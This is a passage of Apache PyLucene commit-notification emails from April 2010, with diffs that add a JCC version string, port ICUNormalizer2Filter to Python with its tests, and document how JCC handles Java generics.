-0000 Delivered-To: [email protected] Received: (qmail 98232 invoked by uid 500); 12 Apr 2010 19:33:36 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 98224 invoked by uid 99); 12 Apr 2010 19:33:36 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Apr 2010 19:33:36 +0000 X-ASF-Spam-Status: No, hits=-1361.9 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Apr 2010 19:33:35 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 38CE323888EC; Mon, 12 Apr 2010 19:33:15 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r933375 - in /lucene/pylucene/trunk/jcc: CHANGES jcc/sources/jcc.cpp setup.py Date: Mon, 12 Apr 2010 19:33:15 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Mon Apr 12 19:33:14 2010 New Revision: 933375 URL: http://svn.apache.org/viewvc?rev=933375&view=rev Log: - added JCC_VERSION string to modules using JCC Modified: lucene/pylucene/trunk/jcc/CHANGES lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp lucene/pylucene/trunk/jcc/setup.py Modified: lucene/pylucene/trunk/jcc/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/CHANGES?rev=933375&r1=933374&r2=933375&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/CHANGES (original) +++ lucene/pylucene/trunk/jcc/CHANGES Mon Apr 12 19:33:14 2010 @@ -15,6 +15,7 @@ Version 2.5 -> - added support for auto-boxing CharSequence from python str and unicode - added support for auto-boxing Number from python int, long and float - added 'asm' to list of reserved words + - added JCC_VERSION string to modules using JCC - Version 2.4 -> 2.5 Modified: lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp?rev=933375&r1=933374&r2=933375&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp Mon Apr 12 19:33:14 2010 @@ -304,6 +304,14 @@ _DLL_EXPORT PyObject *initJCC(PyObject * PyEval_InitThreads(); INSTALL_TYPE(JCCEnv, module); +#ifdef _MSC_VER +#define verstring(n) #n + PyObject *ver = PyString_FromString(verstring(JCC_VER)); +#else + PyObject *ver = PyString_FromString(JCC_VER); +#endif + PyObject_SetAttrString(module, "JCC_VERSION", ver); Py_DECREF(ver); + if (env == NULL) env = new JCCEnv(NULL, NULL); @@ -620,7 +628,7 @@ extern "C" { } }; -void JNICALL PythonException_getErrorInfo(JNIEnv *vm_env, jobject self) +static void JNICALL _PythonException_getErrorInfo(JNIEnv *vm_env, jobject self) { PythonGIL gil(vm_env); @@ -708,7 +716,7 @@ void JNICALL PythonException_getErrorInf PyErr_Restore(type, value, tb); } -void JNICALL PythonException_clear(JNIEnv *vm_env, jobject self) +static void JNICALL _PythonException_clear(JNIEnv *vm_env, jobject self) { PythonGIL gil(vm_env); PyErr_Clear(); @@ -718,8 +726,8 @@ static void registerNatives(JNIEnv *vm_e { jclass cls = vm_env->FindClass("org/apache/jcc/PythonException"); JNINativeMethod methods[] = { - { "getErrorInfo", "()V", (void *) PythonException_getErrorInfo }, - { "clear", "()V", (void *) PythonException_clear }, + { "getErrorInfo", "()V", (void *) _PythonException_getErrorInfo }, + { "clear", "()V", (void *) _PythonException_clear }, }; vm_env->RegisterNatives(cls, methods, 2); Modified: lucene/pylucene/trunk/jcc/setup.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/setup.py?rev=933375&r1=933374&r2=933375&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/setup.py (original) +++ lucene/pylucene/trunk/jcc/setup.py Mon Apr 12 19:33:14 2010 @@ -257,7 +257,8 @@ def main(debug): kwds = { "extra_compile_args": cflags, "include_dirs": includes, - "define_macros": [('_jcc_lib', None)], + "define_macros": [('_jcc_lib', None), + ('JCC_VER', '"%s"' %(jcc_ver))], "sources": sources[0:2] } if platform in ('darwin', 'ipod'): @@ -299,7 +300,8 @@ def main(debug): extra_compile_args=cflags, extra_link_args=lflags, include_dirs=includes, - define_macros=[('_java_generics', None)], + define_macros=[('_java_generics', None), + ('JCC_VER', '"%s"' %(jcc_ver))], sources=sources)) args = { From [email protected] Mon Apr 12 20:15:20 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95526 invoked from network); 12 Apr 2010 20:15:20 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 12 Apr 2010 20:15:20 -0000 Received: (qmail 41637 invoked by uid 500); 12 Apr 2010 20:15:20 -0000 Delivered-To: [email protected] Received: (qmail 41612 invoked by uid 500); 12 Apr 2010 20:15:20 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 41604 invoked by uid 99); 12 Apr 2010 20:15:20 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Apr 2010 20:15:20 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Apr 2010 20:15:18 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 33D5823889C5; Mon, 12 Apr 2010 20:14:57 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r933394 - /lucene/pylucene/trunk/jcc/setup.py Date: Mon, 12 Apr 2010 20:14:57 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Mon Apr 12 20:14:56 2010 New Revision: 933394 URL: http://svn.apache.org/viewvc?rev=933394&view=rev Log: write VERSION info jcc.config Modified: lucene/pylucene/trunk/jcc/setup.py Modified: lucene/pylucene/trunk/jcc/setup.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/setup.py?rev=933394&r1=933393&r2=933394&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/setup.py (original) +++ lucene/pylucene/trunk/jcc/setup.py Mon Apr 12 20:14:56 2010 @@ -219,6 +219,7 @@ def main(debug): print >>config, 'DEBUG_CFLAGS=%s' %(_debug_cflags) print >>config, 'LFLAGS=%s' %(_lflags) print >>config, 'SHARED=%s' %(enable_shared) + print >>config, 'VERSION="%s"' %(jcc_ver) print >>config config.close() From [email protected] Mon Apr 12 20:41:27 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 1566 invoked from network); 12 Apr 2010 20:41:27 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 12 Apr 2010 20:41:27 -0000 Received: (qmail 75135 invoked by uid 500); 12 Apr 2010 20:41:27 -0000 Delivered-To: [email protected] Received: (qmail 75119 invoked by uid 500); 12 Apr 2010 20:41:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 75111 invoked by uid 99); 12 Apr 2010 20:41:27 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Apr 2010 20:41:27 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 12 Apr 2010 20:41:25 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 67F0A238899B; Mon, 12 Apr 2010 20:41:04 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r933403 - /lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp Date: Mon, 12 Apr 2010 20:41:04 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Mon Apr 12 20:41:04 2010 New Revision: 933403 URL: http://svn.apache.org/viewvc?rev=933403&view=rev Log: move ver setting code out of _once_only Modified: lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp Modified: lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp?rev=933403&r1=933402&r2=933403&view=diff ============================================================================== --- lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp (original) +++ lucene/pylucene/trunk/jcc/jcc/sources/jcc.cpp Mon Apr 12 20:41:04 2010 @@ -298,20 +298,19 @@ static void registerNatives(JNIEnv *vm_e _DLL_EXPORT PyObject *initJCC(PyObject *module) { static int _once_only = 1; +#ifdef _MSC_VER +#define verstring(n) #n + PyObject *ver = PyString_FromString(verstring(JCC_VER)); +#else + PyObject *ver = PyString_FromString(JCC_VER); +#endif + PyObject_SetAttrString(module, "JCC_VERSION", ver); Py_DECREF(ver); if (_once_only) { PyEval_InitThreads(); INSTALL_TYPE(JCCEnv, module); -#ifdef _MSC_VER -#define verstring(n) #n - PyObject *ver = PyString_FromString(verstring(JCC_VER)); -#else - PyObject *ver = PyString_FromString(JCC_VER); -#endif - PyObject_SetAttrString(module, "JCC_VERSION", ver); Py_DECREF(ver); - if (env == NULL) env = new JCCEnv(NULL, NULL); From [email protected] Sat Apr 17 22:08:27 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 36469 invoked from network); 17 Apr 2010 22:08:27 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 17 Apr 2010 22:08:27 -0000 Received: (qmail 4613 invoked by uid 500); 17 Apr 2010 22:08:27 -0000 Delivered-To: [email protected] Received: (qmail 4594 invoked by uid 500); 17 Apr 2010 22:08:27 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 4585 invoked by uid 99); 17 Apr 2010 22:08:27 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 17 Apr 2010 22:08:27 +0000 X-ASF-Spam-Status: No, hits=-1379.1 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 17 Apr 2010 22:08:25 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id EC47023888D7; Sat, 17 Apr 2010 22:07:43 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 8bit Subject: svn commit: r935265 - in /lucene/pylucene/trunk: CHANGES Makefile python/ICUNormalizer2Filter.py test/test_Analyzers.py test/test_ICUNormalizer2Filter.py Date: Sat, 17 Apr 2010 22:07:43 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Sat Apr 17 22:07:43 2010 New Revision: 935265 URL: http://svn.apache.org/viewvc?rev=935265&view=rev Log: - added port of ICUNormalizer2Filter that uses C++ ICU's Normalizer2 via PyICU Added: lucene/pylucene/trunk/python/ICUNormalizer2Filter.py (with props) lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py (with props) Modified: lucene/pylucene/trunk/CHANGES lucene/pylucene/trunk/Makefile lucene/pylucene/trunk/test/test_Analyzers.py Modified: lucene/pylucene/trunk/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/CHANGES?rev=935265&r1=935264&r2=935265&view=diff ============================================================================== --- lucene/pylucene/trunk/CHANGES (original) +++ lucene/pylucene/trunk/CHANGES Sat Apr 17 22:07:43 2010 @@ -3,6 +3,7 @@ Version 3.0.0 -> ---------------- - improved support for building on Windows with mingw32 - added wininst target to Makefile + - added port of ICUNormalizer2Filter that uses C++ ICU's Normalizer2 via PyICU - Version 2.9.0 -> 3.0.0 Modified: lucene/pylucene/trunk/Makefile URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/Makefile?rev=935265&r1=935264&r2=935265&view=diff ============================================================================== --- lucene/pylucene/trunk/Makefile (original) +++ lucene/pylucene/trunk/Makefile Sat Apr 17 22:07:43 2010 @@ -215,6 +215,7 @@ GENERATE=$(JCC) $(foreach jar,$(JARS),-- --rename org.apache.lucene.search.highlight.SpanScorer=HighlighterSpanScorer \ --version $(LUCENE_VER) \ --module python/collections.py \ + --module python/ICUNormalizer2Filter.py \ --files $(NUM_FILES) generate: jars Added: lucene/pylucene/trunk/python/ICUNormalizer2Filter.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/python/ICUNormalizer2Filter.py?rev=935265&view=auto ============================================================================== --- lucene/pylucene/trunk/python/ICUNormalizer2Filter.py (added) +++ lucene/pylucene/trunk/python/ICUNormalizer2Filter.py Sat Apr 17 22:07:43 2010 @@ -0,0 +1,66 @@ +# -*- coding: utf-8 -*- +# ==================================================================== +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# ==================================================================== +# +# Port of java/org/apache/lucene/analysis/icu/ICUNormalizer2Filter.java +# using IBM's C++ ICU wrapped by PyICU (http://pyicu.osafoundation.org) +# +# Normalize token text with ICU's {@link com.ibm.icu.text.Normalizer2} +# +# With this filter, you can normalize text in the following ways: +# - NFKC Normalization, Case Folding, and removing Ignorables (the default) +# - Using a standard Normalization mode (NFC, NFD, NFKC, NFKD) +# - Based on rules from a custom normalization mapping. +# +# If you use the defaults, this filter is a simple way to standardize +# Unicode text in a language-independent way for search: +# - The case folding that it does can be seen as a replacement for +# LowerCaseFilter: For example, it handles cases such as the Greek +# sigma, so that "Μάϊος" and "ΜΆΪΟΣ" will match correctly. +# - The normalization will standardizes different forms of the same +# character in Unicode. For example, CJK full-width numbers will be +# standardized to their ASCII forms. +# - Ignorables such as Zero-Width Joiner and Variation Selectors are +# removed. These are typically modifier characters that affect display. +# +# ==================================================================== + +from lucene import PythonTokenFilter, CharTermAttribute +from icu import Normalizer2, UNormalizationMode2, UNormalizationCheckResult + + +class ICUNormalizer2Filter(PythonTokenFilter): + + def __init__(self, input, normalizer=None): + super(ICUNormalizer2Filter, self).__init__(input) + + self.input = input + self.termAtt = self.addAttribute(CharTermAttribute.class_); + + if normalizer is None: + normalizer = Normalizer2.getInstance(None, "nfkc_cf", UNormalizationMode2.UNORM2_COMPOSE) + self.normalizer = normalizer + + def incrementToken(self): + + if self.input.incrementToken(): + text = self.termAtt.toString() + + if self.normalizer.quickCheck(text) != UNormalizationCheckResult.UNORM_YES: + self.termAtt.setEmpty() + self.termAtt.append(self.normalizer.normalize(text)) + + return True + + return False Propchange: lucene/pylucene/trunk/python/ICUNormalizer2Filter.py ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/python/ICUNormalizer2Filter.py ------------------------------------------------------------------------------ svn:mime-type = text/plain Modified: lucene/pylucene/trunk/test/test_Analyzers.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/test/test_Analyzers.py?rev=935265&r1=935264&r2=935265&view=diff ============================================================================== --- lucene/pylucene/trunk/test/test_Analyzers.py (original) +++ lucene/pylucene/trunk/test/test_Analyzers.py Sat Apr 17 22:07:43 2010 @@ -13,7 +13,7 @@ # ==================================================================== from unittest import main -from BaseTokenStreamTestCase import BaseTokenStreamTestCase; +from BaseTokenStreamTestCase import BaseTokenStreamTestCase from lucene import * Added: lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py?rev=935265&view=auto ============================================================================== --- lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py (added) +++ lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py Sat Apr 17 22:07:43 2010 @@ -0,0 +1,90 @@ +# -*- coding: utf-8 -*- +# ==================================================================== +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. +# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# ==================================================================== +# +# Port of java/org/apache/lucene/analysis/icu/ICUNormalizer2Filter.java +# using IBM's C++ ICU wrapped by PyICU (http://pyicu.osafoundation.org) + +try: + from icu import Normalizer2, UNormalizationMode2 +except ImportError, e: + pass + +from unittest import main +from BaseTokenStreamTestCase import BaseTokenStreamTestCase + +from lucene import * +from lucene.ICUNormalizer2Filter import ICUNormalizer2Filter + + +class TestICUNormalizer2Filter(BaseTokenStreamTestCase): + + def testDefaults(self): + + class analyzer(PythonAnalyzer): + def tokenStream(_self, fieldName, reader): + return ICUNormalizer2Filter(WhitespaceTokenizer(Version.LUCENE_CURRENT, reader)) + + a = analyzer() + + # case folding + self._assertAnalyzesTo(a, "This is a test", + [ "this", "is", "a", "test" ]) + + # case folding + self._assertAnalyzesTo(a, "Ruß", [ "russ" ]) + + # case folding + self._assertAnalyzesTo(a, u"ΜΆΪΟΣ", [ u"μάϊοσ" ]) + self._assertAnalyzesTo(a, u"Μάϊος", [ u"μάϊοσ" ]) + + # supplementary case folding + self._assertAnalyzesTo(a, u"𐐖", [ u"𐐾" ]) + + # normalization + self._assertAnalyzesTo(a, u"ﴳﴺﰧ", [ u"طمطمطم" ]) + + # removal of default ignorables + self._assertAnalyzesTo(a, u"क्‍ष", [ u"क्ष" ]) + + def testAlternate(self): + + class analyzer(PythonAnalyzer): + # specify nfc with decompose to get nfd + def tokenStream(_self, fieldName, reader): + return ICUNormalizer2Filter(WhitespaceTokenizer(Version.LUCENE_CURRENT, reader), + Normalizer2.getInstance(None, "nfc", UNormalizationMode2.UNORM2_DECOMPOSE)) + + a = analyzer() + # decompose EAcute into E + combining Acute + self._assertAnalyzesTo(a, u"\u00E9", [ u"\u0065\u0301" ]) + + +if __name__ == "__main__": + import sys, lucene + try: + import icu + except ImportError: + pass + else: + lucene.initVM() + if '-loop' in sys.argv: + sys.argv.remove('-loop') + while True: + try: + main() + except: + pass + else: + main() Propchange: lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py ------------------------------------------------------------------------------ svn:eol-style = native Propchange: lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py ------------------------------------------------------------------------------ svn:mime-type = text/plain From [email protected] Sun Apr 18 00:02:10 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 66287 invoked from network); 18 Apr 2010 00:02:10 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 18 Apr 2010 00:02:10 -0000 Received: (qmail 45060 invoked by uid 500); 18 Apr 2010 00:02:10 -0000 Delivered-To: [email protected] Received: (qmail 45035 invoked by uid 500); 18 Apr 2010 00:02:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 45027 invoked by uid 99); 18 Apr 2010 00:02:10 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Apr 2010 00:02:10 +0000 X-ASF-Spam-Status: No, hits=-1395.5 required=10.0 tests=ALL_TRUSTED,AWL X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Apr 2010 00:02:09 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 9A03A23888C2; Sun, 18 Apr 2010 00:01:27 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r935277 - in /lucene/pylucene/trunk: CHANGES python/ICUNormalizer2Filter.py test/test_ICUNormalizer2Filter.py Date: Sun, 18 Apr 2010 00:01:27 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> Author: vajda Date: Sun Apr 18 00:01:27 2010 New Revision: 935277 URL: http://svn.apache.org/viewvc?rev=935277&view=rev Log: - added port of ICUNormalizer2Filter using C++ ICU's Normalizer2 via PyICU Modified: lucene/pylucene/trunk/CHANGES lucene/pylucene/trunk/python/ICUNormalizer2Filter.py lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py Modified: lucene/pylucene/trunk/CHANGES URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/CHANGES?rev=935277&r1=935276&r2=935277&view=diff ============================================================================== --- lucene/pylucene/trunk/CHANGES (original) +++ lucene/pylucene/trunk/CHANGES Sun Apr 18 00:01:27 2010 @@ -3,7 +3,7 @@ Version 3.0.0 -> ---------------- - improved support for building on Windows with mingw32 - added wininst target to Makefile - - added port of ICUNormalizer2Filter that uses C++ ICU's Normalizer2 via PyICU + - added port of ICUNormalizer2Filter using C++ ICU's Normalizer2 via PyICU - Version 2.9.0 -> 3.0.0 Modified: lucene/pylucene/trunk/python/ICUNormalizer2Filter.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/python/ICUNormalizer2Filter.py?rev=935277&r1=935276&r2=935277&view=diff ============================================================================== --- lucene/pylucene/trunk/python/ICUNormalizer2Filter.py (original) +++ lucene/pylucene/trunk/python/ICUNormalizer2Filter.py Sun Apr 18 00:01:27 2010 @@ -49,7 +49,7 @@ class ICUNormalizer2Filter(PythonTokenFi self.termAtt = self.addAttribute(CharTermAttribute.class_); if normalizer is None: - normalizer = Normalizer2.getInstance(None, "nfkc_cf", UNormalizationMode2.UNORM2_COMPOSE) + normalizer = Normalizer2.getInstance(None, "nfkc_cf", UNormalizationMode2.COMPOSE) self.normalizer = normalizer def incrementToken(self): @@ -57,7 +57,7 @@ class ICUNormalizer2Filter(PythonTokenFi if self.input.incrementToken(): text = self.termAtt.toString() - if self.normalizer.quickCheck(text) != UNormalizationCheckResult.UNORM_YES: + if self.normalizer.quickCheck(text) != UNormalizationCheckResult.YES: self.termAtt.setEmpty() self.termAtt.append(self.normalizer.normalize(text)) Modified: lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py URL: http://svn.apache.org/viewvc/lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py?rev=935277&r1=935276&r2=935277&view=diff ============================================================================== --- lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py (original) +++ lucene/pylucene/trunk/test/test_ICUNormalizer2Filter.py Sun Apr 18 00:01:27 2010 @@ -64,7 +64,7 @@ class TestICUNormalizer2Filter(BaseToken # specify nfc with decompose to get nfd def tokenStream(_self, fieldName, reader): return ICUNormalizer2Filter(WhitespaceTokenizer(Version.LUCENE_CURRENT, reader), - Normalizer2.getInstance(None, "nfc", UNormalizationMode2.UNORM2_DECOMPOSE)) + Normalizer2.getInstance(None, "nfc", UNormalizationMode2.DECOMPOSE)) a = analyzer() # decompose EAcute into E + combining Acute From [email protected] Sun Apr 18 21:20:38 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 77976 invoked from network); 18 Apr 2010 21:20:38 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 18 Apr 2010 21:20:38 -0000 Received: (qmail 20171 invoked by uid 500); 18 Apr 2010 21:20:38 -0000 Delivered-To: [email protected] Received: (qmail 20152 invoked by uid 500); 18 Apr 2010 21:20:38 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <pylucene-commits.lucene.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 20144 invoked by uid 99); 18 Apr 2010 21:20:38 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Apr 2010 21:20:38 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 18 Apr 2010 21:20:35 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 4449823888FE; Sun, 18 Apr 2010 21:19:48 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r935415 - /lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml Date: Sun, 18 Apr 2010 21:19:48 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: vajda Date: Sun Apr 18 21:19:47 2010 New Revision: 935415 URL: http://svn.apache.org/viewvc?rev=935415&view=rev Log: - added paragraph about Java generics handling Modified: lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml Modified: lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml URL: http://svn.apache.org/viewvc/lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml?rev=935415&r1=935414&r2=935415&view=diff ============================================================================== --- lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml (original) +++ lucene/pylucene/site/src/documentation/content/xdocs/jcc/documentation/readme.xml Sun Apr 18 21:19:47 2010 @@ -391,9 +391,9 @@ <p> Many Java APIs are declared to return types that are less specific than the types actually returned. In Java 1.5, this is worked around - with annotations. JCC does not heed annotations at the moment. A - Java API declared to return <code>Object</code> will wrap objects as - such. + with type parameters. JCC generates code to heed type parameters + unless the <code>--no-generics</code> is used. See next section for + details on Java generics support. </p> <p> In C++, casting the object into its actual type is supported via the @@ -415,6 +415,63 @@ print booleanQuery.getClauses() </source> </section> + <section id="generics"> + <title>Handling generic classes</title> + <p> + Java 1.5 added support for parameterized types. JCC generates code + to heed type parameters unless the <code>--no-generics</code> + command line parameter is used. Java type parameterization is a + runtime feature. There is only one class used for all its + parameterizations. Similarly, JCC wrapper objects all use the same + class but store type parameterizations on instances and make them + accessible as a tuple via the <code>parameters_</code> variable. + </p> + <p> + For example, an <code>ArrayList&lt;Document&gt;</code> instance, + has <code>(&lt;type 'Document'&gt;,)</code> + for <code>parameters_</code> and its <code>get()</code> method uses + that type parameter to wrap its return values. + </p> + <p> + To allocate an instance of a generic Java class with specific type + parameters use the <code>of_()</code> method. This method accepts + one or more Python classes to use as type parameters. For + example, <code>java.util.ArrayList&lt;E&gt;</code> is declared to + accept one type parameter. Its wrapper's <code>of_()</code> + hence accepts one parameter, a Python class, to use as type + parameter for the return type of its <code>get()</code> method, among + others: + </p> + <source> + >>> a = ArrayList().of_(Document) + >>> a + &lt;ArrayList: []&gt; + >>> a.parameters_ + (&lt;type 'Document'&gt;,) + >>> a.add(Document()) + True + >>> a.get(0) + &lt;Document: Document&lt;&gt;&gt; + </source> + <p> + The use of type parameters is, of course, optional. A generic Java + class can still be used as before, without type parameters. + Downcasting from <code>Object</code> is then necessary: + </p> + <source> + >>> a = ArrayList() + >>> a + &lt;ArrayList: []&gt; + >>> a.parameters_ + (None,) + >>> a.add(Document()) + True + >>> a.get(0) + &lt;Object: Document&lt;&gt;&gt; + >>> Document.cast_(a.get(0)) + &lt;Document: Document&lt;&gt;&gt; + </source> + </section> <section id="arrays"> <title>Handling arrays</title> <p> From [email protected] Mon Apr 19 06:47:13 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 62001 invoked from network); 19 Apr 2010 06:47:13 -0000 Received: from unknown (HELO mail.apache.org) (161.129.204.104) by 161.129.204.104 with SMTP; 19 Apr 2010 06:47:13 -0000 Received: (qmail 19822 invoked by uid 500); 19 Apr 2010 